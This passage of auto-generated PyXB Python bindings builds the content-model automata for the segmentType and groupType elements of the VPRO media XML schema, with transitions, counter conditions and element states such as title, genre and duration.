fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_16, False) ]))
st_18._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_17, True) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_17, False) ]))
st_19._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_18, True) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_18, False) ]))
st_20._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_19, True) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_19, False) ]))
st_21._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_20, True) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_20, False) ]))
st_22._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_21, True) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_21, False) ]))
st_23._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_22, True) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_32, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, True) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_33, False) ]))
st_35._set_transitionSet(transitions)
transitions = []
st_36._set_transitionSet(transitions)
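# Note: the third positional argument (False) is, per pyxb.utils.fac, the
# nullable flag: segmentType's content model does not accept an empty
# element sequence.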
return fac.Automaton(states, counters, False, containing_state=None)
segmentType._Automaton = _BuildAutomaton_29()
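# Register the poSeriesID element with groupType before building the
# content-model automaton for groupType below.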
groupType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'poSeriesID'), pyxb.binding.datatypes.string, scope=groupType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10)))
def _BuildAutomaton_30 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_30
del _BuildAutomaton_30
import pyxb.utils.fac as fac
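# Construct the finite automaton with counters (FAC) that validates the
# content model whose symbols are groupType's element uses.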
counters = set()
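# Each CounterCondition carries the occurrence bounds (minOccurs/maxOccurs)
# of one particle in the content model; max=None means unbounded.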
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10))
counters.add(cc_33)
states = []
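# One automaton state per element use in the content model; a state is
# accepting when its final_update is a set (possibly empty) rather than None.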
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
